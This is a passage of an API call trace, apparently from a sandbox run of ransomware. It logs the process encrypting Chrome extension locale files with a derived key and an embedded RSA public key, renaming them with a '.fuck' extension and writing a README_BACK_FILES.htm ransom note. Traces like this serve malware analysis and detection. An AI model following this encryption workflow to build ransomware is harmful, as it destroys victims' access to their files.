Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.609] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.610] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.612] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.612] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.612] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.612] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.612] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.612] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.612] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e753b8) returned 1 [0263.612] CryptImportPublicKeyInfo (in: hCryptProv=0x2e753b8, dwCertEncodingType=0x1, pInfo=0x2eaeef0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaef20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaef28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e7c0) returned 1 [0263.613] CryptEncrypt (in: hKey=0x2e7e7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.613] CryptEncrypt (in: hKey=0x2e7e7c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e756e8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e756e8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.613] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e756e8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e756e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.614] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.616] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.616] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.657] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.658] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.658] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.658] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.658] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.658] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.658] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.658] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.658] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.658] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.658] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.658] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.659] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.659] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.659] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.659] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.659] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.659] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.659] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.659] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.659] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.659] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.659] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.659] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.659] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.659] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.659] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.659] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.659] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.660] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.660] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.660] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.660] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.660] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.660] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.660] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.660] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.660] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.660] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.660] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.660] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.660] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.660] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.660] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.660] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.660] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.660] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.660] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.661] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.661] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.661] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.661] ReadFile (in: hFile=0x5d60, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x8b, lpOverlapped=0x0) returned 1 [0263.661] CryptEncrypt (in: hKey=0x2e7de00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x8b, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x90) returned 1 [0263.661] WriteFile (in: hFile=0x5d5c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x90, lpOverlapped=0x0) returned 1 [0263.661] CloseHandle (hObject=0x5d60) returned 1 [0263.661] CloseHandle (hObject=0x5d5c) returned 1 [0263.661] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json"), bFailIfExists=0) returned 1 [0263.664] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json", dwFileAttributes=0x0) returned 1 [0263.664] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.gsg")) returned 1 [0263.665] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json.fuck")) returned 1 [0263.666] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.666] CryptDestroyKey (hKey=0x2e7de00) returned 1 [0263.666] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.666] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.666] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.667] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\readme_back_files.htm")) returned 0xffffffff [0263.667] AreFileApisANSI () returned 1 [0263.667] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.667] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.668] GetFileType (hFile=0x5d64) returned 0x1 [0263.668] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.669] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.669] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fd40 [0263.669] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.669] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.669] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.669] GetLastError () returned 0x0 [0263.669] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json")) returned 0x20 [0263.670] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json", dwFileAttributes=0x80) returned 1 [0263.671] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.671] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.672] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 